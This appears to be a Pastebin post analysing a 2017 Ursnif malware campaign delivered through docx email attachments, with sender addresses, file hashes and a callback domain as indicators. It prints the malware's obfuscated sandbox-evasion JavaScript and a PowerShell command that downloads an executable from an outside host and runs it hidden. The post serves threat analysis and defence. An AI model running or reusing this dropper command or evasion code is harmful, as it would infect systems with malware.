API tools faq
paste
Advertisement
c0d3inj3cT

Untitled

c0d3inj3cT
Sep 14th, 2017
686
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
raw download clone embed print report
  1. Quick Analysis of Ongoing Ursnif campaign - 13th September 2017
  2.  
  3. Malware Delivery Method -> docx attachment in email
  4.  
  5. docx -> embedded JavaScript -> powershell -> downloads payload over HTTPS
  6.  
  7. Example:
  8.  
  9. Document sent as an attachment in the following email:
  10.  
  11. Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?=
  12. From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <maeda@admac.co.jp>
  13. To: <erik@bajabushpilots.com>
  14.  
  15. Original attachment name: 原価請求書です277253.docx (translates to copy of Invoice)
  16. MD5 hash: 85d09006634ab5f2138ac927997accda
  17.  
  18. Below are the unique sender email addresses observed in the Ursnif campaign which are sending the malicious Documents as email attachments:
  19.  
  20. chris@lightsmith.com
  21. erik@bajabushpilots.com
  22. fpalacio@espublico.com
  23.  
  24. And below are the spoofed addresses:
  25.  
  26. kunio@jpntrust.co.jp
  27. k-hayashiyama@hoxin-group.co.jp
  28. maeda@admac.co.jp
  29.  
  30. Embedded JavaScript in the docx performs the following tasks:
  31.  
  32. // Detects Sleep Short Circuiting by checking the time difference between timestamps before and after Sleep function is invoked.
  33.  
  34. piUCkfeTbuHWBQdaRl="getS"+"ec"+"onds";
  35. TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();
  36. WScript.Sleep(1000);
  37. qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();
  38.  
  39. If Sleep Short Circuiting is not detected then JavaScript will execute Powershell to download the malicious payload over HTTPS as shown below:
  40.  
  41. lhzYcTRDtUorLVmdP.ShellExecute("cmd.eXE", "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://aedwards.co/wp-includes/IXR/get.php?jgTbz','%appdata%xJr23.eXe'); sTarT-PROcess '%appdAta%xJr23.exe'", "", "open", 0);
  42.  
  43. MD5 hash of the downloaded payload: c0b7897f69f0a68297969c709cac576d
  44.  
  45. Downloaded payload will perform the following Network Callback post execution:
  46.  
  47. antispam.city/images/Ncd0ce3MW_2Br1/2xSMfrx83BhD9VwVpJlrz/Vcj4Y3fgOgnnRFQY/b5MMsaAEnTYFOQb/9smbf8JBZRu4uT2DPA/m3IUcDt7p/eRM513X067tKgbFbFUAP/CgywchBtV2v2M3vHdCF/Pye9qtR5e88uvj4d5msIyY/XHeVYOb9Z5pcC/GutfKuT3/w_2Bd1EzlOjZGmrVBuR7_2F/waO8u_2BBp/YC_2FNg9W/K92jQnG.jpeg
  48.  
  49. Interesting callback domain name: antispam.city (how ironic) :D
  50.  
  51. Whois info shows that this domain was recently registered on 14th August 2017.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!